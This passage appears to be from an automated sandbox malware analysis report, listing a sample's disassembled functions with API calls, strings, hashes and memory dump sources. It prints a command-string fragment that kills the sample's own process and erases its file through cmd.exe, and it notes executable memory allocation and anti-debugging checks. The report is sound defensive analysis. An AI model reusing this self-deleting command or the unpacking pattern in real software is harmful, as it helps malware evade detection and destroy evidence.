Part of subcall function 00402360: Concurrency::cancel_current_task.LIBCPMT ref: 00402493

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401863
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401889

Strings

Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 00401841
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00401867
text, xrefs: 00401BBC
GET, xrefs: 00401FBA
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 0040181B
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 004017D9
o_, xrefs: 00401B8D

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: HeadersHttpRequest$Concurrency::cancel_current_task
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$text$o_
API String ID: 2146599340-4191282871
Opcode ID: 14ea69447f8d9470d916f2b42ef2e13539d74d65fa3d14c6167c9aa071c922b4
Instruction ID: 415aaf8c01778e9a7b83fe6df7b6579b34767485ae2c294baba205d42775c37b
Opcode Fuzzy Hash: 14ea69447f8d9470d916f2b42ef2e13539d74d65fa3d14c6167c9aa071c922b4
Instruction Fuzzy Hash: D7313071E00109EBEB14DBA9CC85FEEBBB9EB48714F60C12AE511761C1C778A644CBA5

Function 00403B60 Relevance: 18.1, APIs: 8, Strings: 2, Instructions: 585
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.exe, xrefs: 00403D4F, 00403D63
open, xrefs: 00403FBD

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: .exe$open
API String ID: 1518329722-49952409
Opcode ID: 428aa21f59ae7c8af441ea776938a918b51841c89c7687ee989bc8f4faa0d2e7
Instruction ID: a9da27ac599a6b8e91c3fd6d4a24e6c5149ad7a4ffe67bf8e9db85a8b47d22d5
Opcode Fuzzy Hash: 428aa21f59ae7c8af441ea776938a918b51841c89c7687ee989bc8f4faa0d2e7
Instruction Fuzzy Hash: 372226B1E002189BDB14DB64CD45BDEB775AF85308F1042BEE504B72C2DB789E84CB99

Function 005F003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005F024D

Strings

kernel32.dll, xrefs: 005F008F, 005F0095
cess, xrefs: 005F018D

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 4b65ce4eff50f675edf1d61a99df40599f3613a345a7b7b0bfdd16d4a1f72893
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: B9526974A01229DFDB64CF58C984BA8BBB1BF09304F1480D9E54DAB392DB34AE85DF14

Function 00403460 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32(FFC4BD39), ref: 0040348C

Part of subcall function 004033C0: OpenProcess.KERNEL32(00000410,00000000), ref: 004033EB
Part of subcall function 004033C0: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00403406
Part of subcall function 004033C0: FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040340D

GetCurrentProcessId.KERNEL32 ref: 004034A8

Part of subcall function 004032C0: OpenProcess.KERNEL32(00000410,00000000), ref: 00403320
Part of subcall function 004032C0: K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 0040333D
Part of subcall function 004032C0: K32GetModuleBaseNameA.KERNEL32(00000000,?,?,00000104), ref: 0040335A
Part of subcall function 004032C0: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00403361

ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,00000000,00000000,00000000), ref: 00403549

Strings

/c taskkill /im ", xrefs: 004034BC
C:\Windows\System32\cmd.exe, xrefs: 00403540
" & exit, xrefs: 004034EF
" /f & erase ", xrefs: 004034CD

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Process$ChangeCloseCurrentFindModuleNameNotificationOpen$BaseEnumExecuteFileModulesShell
String ID: " & exit$" /f & erase "$/c taskkill /im "$C:\Windows\System32\cmd.exe
API String ID: 3061982424-793869484
Opcode ID: b3375a236c46a470e38a8e354ebc4db9882fc7f181f3602ddbb500160f214fec
Instruction ID: 2e8ef820f282173de3a5c0c200e8d31d3c87c05bdf285791daca05c13fb4c3b4
Opcode Fuzzy Hash: b3375a236c46a470e38a8e354ebc4db9882fc7f181f3602ddbb500160f214fec
Instruction Fuzzy Hash: 80215E30A14258EAD704EBB5CC4AFDEB7B4AB14704F90807AE105B71D1EFB82A09CB59

Function 004032C0 Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(00000410,00000000), ref: 00403320
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 0040333D
K32GetModuleBaseNameA.KERNEL32(00000000,?,?,00000104), ref: 0040335A
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00403361

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Process$BaseChangeCloseEnumFindModuleModulesNameNotificationOpen
String ID:
API String ID: 1316604328-0
Opcode ID: f641654e239b136ad081a31f0cf5502f207401936df4ffd3635a1637b788bd7b
Instruction ID: 73631daf7ce5aac98572d24e1a4b5d2d377a29978ca40ee8a754bfc341a3cae0
Opcode Fuzzy Hash: f641654e239b136ad081a31f0cf5502f207401936df4ffd3635a1637b788bd7b
Instruction Fuzzy Hash: 1721C775E002199BD7259F24CC05BEABBB8BF09304F0041EAE948A7280DBB45BC5CB99

Function 004033C0 Relevance: 4.6, APIs: 3, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(00000410,00000000), ref: 004033EB
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00403406
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040340D

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ChangeCloseFileFindModuleNameNotificationOpenProcess
String ID:
API String ID: 4186666201-0
Opcode ID: 6df689ec684a3f7cc5afff234a5f2151117d01217c65fdc158e8d0652fdfffbd
Instruction ID: d7a07742e059f4eedb93066d2b74499af573fdee13e6c25b282feff1518e3c00
Opcode Fuzzy Hash: 6df689ec684a3f7cc5afff234a5f2151117d01217c65fdc158e8d0652fdfffbd
Instruction Fuzzy Hash: 981108746002149BD7219F24CC09BEEBBB8EB45704F0041ADE48597280DBB95B858FD5

Function 00401DC0 Relevance: 3.2, APIs: 2, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da01b423936aeb7615f534b13c88eb4133f5022103bcab4d98451e1c4a76f6f7
Instruction ID: 275e588d9e50ffbde70bb415e0e4df9d8fb441a2a01127472003d5923db9de75
Opcode Fuzzy Hash: da01b423936aeb7615f534b13c88eb4133f5022103bcab4d98451e1c4a76f6f7
Instruction Fuzzy Hash: 0051B071E002099FDB14CFA9C985BEEBBB9EF08714F10822AE911B72C1D7795945CBA4

Function 005F0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,005F0223,?,?), ref: 005F0E19
SetErrorMode.KERNELBASE(00000000,?,?,005F0223,?,?), ref: 005F0E1E

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: d5a6bee1921c2ef6b516d6639c820d1612de59ea02b9ca9833ad81ad95a80bb3
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 21D0123154512CB7D7002A94DC09BDD7F1CDF05B62F048411FB0DD9081C774994046E5

Function 00404130 Relevance: 2.7, APIs: 2, Instructions: 171
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404450: __Init_thread_footer.LIBCMT ref: 004044A9

Part of subcall function 004043B0: __Init_thread_footer.LIBCMT ref: 0040442D

Sleep.KERNEL32(00001388,00000000,?,?,?,004278F0), ref: 004042BB
Sleep.KERNELBASE(000007D0), ref: 00404399

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Init_thread_footerSleep
String ID:
API String ID: 1811701964-0
Opcode ID: 1eb676f066d99a6951513b08381f526a054554f8ff1f4eace3d38b9e98a929ca
Instruction ID: f47d4bf3aa8217b0a2db0b649b37c3183a3f05cd64a2a128314c0ca4abf38ca6
Opcode Fuzzy Hash: 1eb676f066d99a6951513b08381f526a054554f8ff1f4eace3d38b9e98a929ca
Instruction Fuzzy Hash: E351E170E002149ADB10F765D94ABEE77749B55308F5040BEE905772C2EEBC5F48CBAA

Function 004304E3 Relevance: 1.5, APIs: 1, Instructions: 38libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(00437B28,00430944), ref: 00430553

Memory Dump Source

Source File: 00000000.00000002.2073120364.000000000042F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0042F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_42f000_file.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d2d658533eb0c5893b18105ccd4f9188a834445ae5ef70a488e837595590a98b
Instruction ID: 693cbdbc1d625c2c3136cdd724feea05d7464d4f228041b1de58d889fb66f4bf
Opcode Fuzzy Hash: d2d658533eb0c5893b18105ccd4f9188a834445ae5ef70a488e837595590a98b
Instruction Fuzzy Hash: 7BF0E2996AD380D8F62087E0BC65B346371EF44B58F607427D680CF1F0E2A215D0D75D

Function 0041225F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00408E8B,?,?,?,004010DD,?,004027B7,?,?,?), ref: 00412291

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6257d7c2ee276c5d0fd134f5db4d8c55f501502e1b82d9c04a80d06860ad0d6c
Instruction ID: 5cb36e0056375fee73f1b473a79b13938530415edbee3f35a59dbc19130cbbfd
Opcode Fuzzy Hash: 6257d7c2ee276c5d0fd134f5db4d8c55f501502e1b82d9c04a80d06860ad0d6c
Instruction Fuzzy Hash: 7CE06C3154023557DE213695AD00FDF3B589F423B0F1502A7AC49D65D0CBFDDC9191AD

Function 004304BE Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(00000040,?), ref: 004304DB

Memory Dump Source

Source File: 00000000.00000002.2073120364.000000000042F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0042F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_42f000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 99d8a4da74df058c88bca951efc125344f112f7476fa45f023b7ded1510f372d
Instruction ID: e82073e5ad5dd999e682fd0284a24c26791b6f559f13f1e34f8181d391d63f3c
Opcode Fuzzy Hash: 99d8a4da74df058c88bca951efc125344f112f7476fa45f023b7ded1510f372d
Instruction Fuzzy Hash: D8D0C9B114E288BFD7124751AC41E957F78EB06204B0511A3EA81D64B2C269A91DE729

Function 0040C8EF Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0040C902

Part of subcall function 004110CB: RtlFreeHeap.NTDLL(00000000,00000000,?,004174E5,?,00000000,?,?,?,00417788,?,00000007,?,?,00417C7B,?), ref: 004110E1
Part of subcall function 004110CB: GetLastError.KERNEL32(?,?,004174E5,?,00000000,?,?,?,00417788,?,00000007,?,?,00417C7B,?,?), ref: 004110F3

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 6667695445e9f109479724c427cf7d085ee8c4c0bdef8699b7fb4f0ff9bf3512
Instruction ID: d06dc5c96842a25a6cdbeb5c53ae118faba98c8ac33850a6f46aff271e0b4361
Opcode Fuzzy Hash: 6667695445e9f109479724c427cf7d085ee8c4c0bdef8699b7fb4f0ff9bf3512
Instruction Fuzzy Hash: B1C08C31400248BBCB009B42C806B8E7FB8DB803A8F200088F40017251CBB1EE80AA80

Function 004304C5 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(00000040,?), ref: 004304DB

Memory Dump Source

Source File: 00000000.00000002.2073120364.000000000042F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0042F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_42f000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 07b7bdcf8fb1538897f2ee3e6b5db651aac67362996fad8c200f8459bc5927d7
Instruction ID: 77facc17e16384bcb28701529e1bad19f721354b07d5ca33e1ff128e83678148
Opcode Fuzzy Hash: 07b7bdcf8fb1538897f2ee3e6b5db651aac67362996fad8c200f8459bc5927d7
Instruction Fuzzy Hash: 5FC08CF100810CBBDB118B81EC01E457BBCE704308F002072F301A0470C271F908DB1C

Function 007C4E6D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007C4EBE

Memory Dump Source

Source File: 00000000.00000002.2073463747.00000000007C4000.00000040.00000020.00020000.00000000.sdmp, Offset: 007C4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c4000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: c188bc39d03da7aaa4f1c1aecd1a1a1130618f105f68b7d09095fa66510d298c
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: AA113C79A00208EFDB01DF98C989E99BBF5AF08350F058094F9489B362D775EA90DF80

Non-executed Functions

Function 00418E5E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00410BB0: GetLastError.KERNEL32(00401F35,?,00401F39,0040C2E1,?,00401F35,?,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410BB5
Part of subcall function 00410BB0: SetLastError.KERNEL32(00000000,00000008,000000FF,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410C53

Part of subcall function 00410BB0: _free.LIBCMT ref: 00410C12
Part of subcall function 00410BB0: _free.LIBCMT ref: 00410C48

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00418F6A
IsValidCodePage.KERNEL32(00000000), ref: 00418FB3
IsValidLocale.KERNEL32(?,00000001), ref: 00418FC2
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0041900A
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00419029

Strings

8B, xrefs: 00418F17

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID: 8B
API String ID: 949163717-3070534924
Opcode ID: e5c137cc4e52a6aeb6f167d6b03369957c8f8f5e350233bf44d2245f0b70b712
Instruction ID: a996bb420c703c6d0bb6c35b9a784a2a0235fd6da1246189afd696501c58bc5c
Opcode Fuzzy Hash: e5c137cc4e52a6aeb6f167d6b03369957c8f8f5e350233bf44d2245f0b70b712
Instruction Fuzzy Hash: 47516271A00209AFEB10DFA5CC41AFBB7B9BF48700F14446FF510E7291EB7899858B69

Function 005F4797 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 375COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 005F4930
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 005F4AF1

Strings

`a}{, xrefs: 005F48DA
dyB, xrefs: 005F4AE7
,zB, xrefs: 005F4A89

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Init_thread_footerIos_base_dtorstd::ios_base::_
String ID: ,zB$`a}{$dyB
API String ID: 3517786926-4244951022
Opcode ID: c927c1717c685e362e6a7521dbc4d9e55c0333da3dd9d1045136c6b8e07415f4
Instruction ID: dae8f3cf79e5d93e978ab0ad7e4f6e0dde4b00793b22f2a8ecc1934b36d8b7da
Opcode Fuzzy Hash: c927c1717c685e362e6a7521dbc4d9e55c0333da3dd9d1045136c6b8e07415f4
Instruction Fuzzy Hash: C4E1D271A002498FCB18CF28C989BBEBBB1FF49300F148258E54597791E779AD85CF94

Function 00418C89 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00418FA7,00000002,00000000,?,?,?,00418FA7,?,00000000), ref: 00418D22
GetLocaleInfoW.KERNEL32(00000000,20001004,00418FA7,00000002,00000000,?,?,?,00418FA7,?,00000000), ref: 00418D4B
GetACP.KERNEL32(?,?,00418FA7,?,00000000), ref: 00418D60

Strings

OCP, xrefs: 00418CDD
ACP, xrefs: 00418CA7

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: fa171ee74b4b881c976e0d11b77e9c3ec81e479d149dad4955c2640258b5475e
Instruction ID: 8a411b133bf6b426b53f21e151948afbefd3386fd26e69aaedf8f9840b678e93
Opcode Fuzzy Hash: fa171ee74b4b881c976e0d11b77e9c3ec81e479d149dad4955c2640258b5475e
Instruction Fuzzy Hash: FD21C771B00200AADB318F14E900AD773A6EF60B64B56852FE90AD7250FF3ADDC1C398

Function 00608EF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,0060920E,00000002,00000000,?,?,?,0060920E,?,00000000), ref: 00608F89
GetLocaleInfoW.KERNEL32(00000000,20001004,0060920E,00000002,00000000,?,?,?,0060920E,?,00000000), ref: 00608FB2
GetACP.KERNEL32(?,?,0060920E,?,00000000), ref: 00608FC7

Strings

OCP, xrefs: 00608F44
ACP, xrefs: 00608F0E

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: fa171ee74b4b881c976e0d11b77e9c3ec81e479d149dad4955c2640258b5475e
Instruction ID: 48a798c31467b6e5b75e40f012bd05164f4f023583b2270aea61467f453d4e04
Opcode Fuzzy Hash: fa171ee74b4b881c976e0d11b77e9c3ec81e479d149dad4955c2640258b5475e
Instruction Fuzzy Hash: 9621A762680102AEEB38DF34CA00AD773A7EB54BE0B568574E986C7391EF32DE41C350

Function 006090C5 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00600E17: GetLastError.KERNEL32(005F219C,?,005F21A0,005FC548,?,005F219C,?,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600E1C
Part of subcall function 00600E17: SetLastError.KERNEL32(00000000,0042A190,000000FF,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600EBA

Part of subcall function 00600E17: _free.LIBCMT ref: 00600E79
Part of subcall function 00600E17: _free.LIBCMT ref: 00600EAF

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 006091D1
IsValidCodePage.KERNEL32(00000000), ref: 0060921A
IsValidLocale.KERNEL32(?,00000001), ref: 00609229
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00609271
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00609290

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: df7259d446a3af6e3576c934006f0cb77cadfdf5846bd1cc64a285e1449cbbda
Instruction ID: cf2b44ee6d74d394f4eb6f4efa0adb5200b0202ba326ff88b02d9c6498d7b3e1
Opcode Fuzzy Hash: df7259d446a3af6e3576c934006f0cb77cadfdf5846bd1cc64a285e1449cbbda
Instruction Fuzzy Hash: A8517171B4020AAFDF18DFA5CC45AFB77BBAF44700F144469A910E72D2E7709A44CB64

Function 004084E5 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004084F1
IsDebuggerPresent.KERNEL32 ref: 004085BD
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004085DD
UnhandledExceptionFilter.KERNEL32(?), ref: 004085E7

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: e2c689d7d454bb3c956595545ad9b1c7413774fb7f427a7e40763cd45346718b
Instruction ID: 57180d1da1b45e596e7e3bf41e05ede52537cd0b954fd68fc9914ca7875a48fa
Opcode Fuzzy Hash: e2c689d7d454bb3c956595545ad9b1c7413774fb7f427a7e40763cd45346718b
Instruction Fuzzy Hash: 233149B5D0531CDBDB10DFA0D9897CDBBB8AF08304F1040AAE40DAB290EB759A85CF49

Function 005F874C Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 005F8758
IsDebuggerPresent.KERNEL32 ref: 005F8824
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005F8844
UnhandledExceptionFilter.KERNEL32(?), ref: 005F884E

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: e2c689d7d454bb3c956595545ad9b1c7413774fb7f427a7e40763cd45346718b
Instruction ID: f15101c98d620c6a9d5158138685aa41ee353fb1c66a9d73a21f468db13e64a3
Opcode Fuzzy Hash: e2c689d7d454bb3c956595545ad9b1c7413774fb7f427a7e40763cd45346718b
Instruction Fuzzy Hash: 7C313AB5D0531C9BDB10DFA4D9497DCBBB8BF08304F1040AAE509A7250EB755A85CF05

Function 00418910 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00410BB0: GetLastError.KERNEL32(00401F35,?,00401F39,0040C2E1,?,00401F35,?,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410BB5
Part of subcall function 00410BB0: SetLastError.KERNEL32(00000000,00000008,000000FF,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410C53

Part of subcall function 00410BB0: _free.LIBCMT ref: 00410C12
Part of subcall function 00410BB0: _free.LIBCMT ref: 00410C48

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00418964
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004189AE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00418A74

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: d1a16a8570a630253847ccd717de0e5974cb6fd68c7817ebab67a3b64fd0b853
Instruction ID: 3b98a9a36bc46620b48613ce387c80dcbdd896fed336aeae77e2cec3e5a3d10f
Opcode Fuzzy Hash: d1a16a8570a630253847ccd717de0e5974cb6fd68c7817ebab67a3b64fd0b853
Instruction Fuzzy Hash: 7E616171A146079BDB249F25CD82BFAB7A8EF44354F1440AFED05C6681EB38E9C1CB58

Function 00608B77 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00600E17: GetLastError.KERNEL32(005F219C,?,005F21A0,005FC548,?,005F219C,?,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600E1C
Part of subcall function 00600E17: SetLastError.KERNEL32(00000000,0042A190,000000FF,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600EBA

Part of subcall function 00600E17: _free.LIBCMT ref: 00600E79
Part of subcall function 00600E17: _free.LIBCMT ref: 00600EAF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00608BCB
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00608C15
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00608CDB

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

